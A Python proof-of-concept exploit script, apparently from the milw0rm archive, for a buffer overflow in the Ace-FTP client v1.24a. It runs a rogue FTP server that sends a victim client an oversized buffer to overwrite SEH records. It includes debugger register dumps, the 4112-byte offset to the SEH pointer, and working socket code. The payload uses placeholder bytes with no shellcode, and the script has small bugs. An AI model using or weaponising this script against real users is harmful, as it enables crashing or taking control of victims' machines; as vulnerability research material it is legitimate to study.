121 lines
No EOL
3.6 KiB
Python
Executable file
121 lines
No EOL
3.6 KiB
Python
Executable file
#!/usr/bin/python
|
|
#######################################################################
|
|
#Credit to n00b for finding the bug.
|
|
#Ace-Ftp client buffer over flow p0c.
|
|
#This is possible to exploit as we
|
|
#Smash the seh handlers and there are
|
|
#Plenty of registers that had our buffer
|
|
#Im still new to seh over writes I haven't
|
|
#Had much experience with the seh over write
|
|
#But get the Idea from what I've read about
|
|
#It..Any way this script creates a listening
|
|
#Socket and act's as a ftp server then when the
|
|
#Client connect's a huge buffer is sent back to
|
|
#The client.Resulting and a buffer overflow.
|
|
#If any one feel's like investigating or writing
|
|
#A poc for this please do so give some credits to
|
|
#n00b.I will give it a try during the week.
|
|
#######################################################################
|
|
#Shouts: - Str0ke - Marsu - SM - vade79 - c0ntex - Kevin Finisterre
|
|
#######################################################################
|
|
#Tested:Win xp sp2.
|
|
#Version Affected: v1.24a.
|
|
###################################################
|
|
# \\Debug info//
|
|
###################################################
|
|
#Program received signal SIGSEGV,Segmentation fault.
|
|
#[Switching to thread 1312.0x714]
|
|
#0x00403c58 in ?? ()
|
|
#
|
|
#(gdb) i r
|
|
#
|
|
#eax 0x41414141 1094795585 <----Eax over written..
|
|
#ecx 0x0 0
|
|
#edx 0xa5b464 10859620
|
|
#ebx 0x41414141 1094795585 <----Ebx over written..
|
|
#esp 0x12e458 0x12e458
|
|
#ebp 0x12f48c 0x12f48c
|
|
#esi 0x12e488 1238152
|
|
#edi 0xa5b464 10859620
|
|
#eip 0x403c58 0x403c58
|
|
#eflags 0x10206 66054
|
|
#cs 0x1b 27
|
|
#ss 0x23 35
|
|
#ds 0x23 35
|
|
#es 0x23 35
|
|
#fs 0x3b 59
|
|
#gs 0x0 0
|
|
#fctrl 0xffff1272 -60814
|
|
#fstat 0xffff0000 -65536
|
|
#ftag 0xffffffff -1
|
|
#fiseg 0x0 0
|
|
#fioff 0x0 0
|
|
#foseg 0xffff0000 -65536
|
|
#fooff 0x0 0
|
|
###################################################
|
|
#What the register look like after crash..
|
|
###################################################
|
|
#EAX 41414141
|
|
#ECX 00000000
|
|
#EDX 00A5D930 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAA
|
|
#EBX 41414141
|
|
#ESP 0012E458
|
|
#EBP 0012F48C ASCII "AAAAAAAAAAAADDDDEEEECCCCCCC
|
|
#ESI 0012E488 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAA
|
|
#EDI 00A5D930 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAA
|
|
#EIP 00403C58
|
|
###################################################
|
|
#DS:[41414141]=???
|
|
#EDX=00A5D930, (ASCII "AAAAAAAAAAAAAAAAAAAAAAAAA)
|
|
#MOV EDX,DWORD PTR DS:[EAX]
|
|
###################################################
|
|
#SEH chain of main thread
|
|
#Address SE handler
|
|
#---------------------------
|
|
#0012E46C AceXFTP.00430B9E
|
|
#45454545
|
|
#---------------------------
|
|
#0012F498 44444444 Pointer to next SEH record
|
|
#0012F49C 45454545 SE handler
|
|
#
|
|
#4112byte's to over write Pointer to next SEH record
|
|
#next 4 bytes over writes se handler.
|
|
###################################################
|
|
|
|
|
|
from socket import *
|
|
from struct import pack
|
|
|
|
host = "127.0.0.1 "
|
|
port = 21
|
|
|
|
Size_of_buf1 = 4112
|
|
Size_of_buf2 = 550
|
|
|
|
|
|
s = socket(AF_INET, SOCK_STREAM)
|
|
s.bind((host, port))
|
|
s.listen(1)
|
|
print "\nPort %d open Waiting !!!! ..." % port
|
|
|
|
cl, addr = s.accept()
|
|
print "Vic is connected %s" % addr[0]
|
|
|
|
buf1 = "A" * Size_of_buf1
|
|
|
|
NEXT_SEH_RECORD = "\x44\x44\x44\x44"
|
|
|
|
SE_HANDLER = "\x45\x45\x45\x45"
|
|
|
|
buf2 = "C" * Size_of_buf2
|
|
|
|
End = "\r\n"
|
|
|
|
cl.send(buf1 + NEXT_SEH_RECORD + SE_HANDLER + buf2 + End)
|
|
print "mission accomplished : OK\n"
|
|
|
|
sleep(3)
|
|
cl.close()
|
|
s.close()
|
|
|
|
# milw0rm.com [2007-06-10] |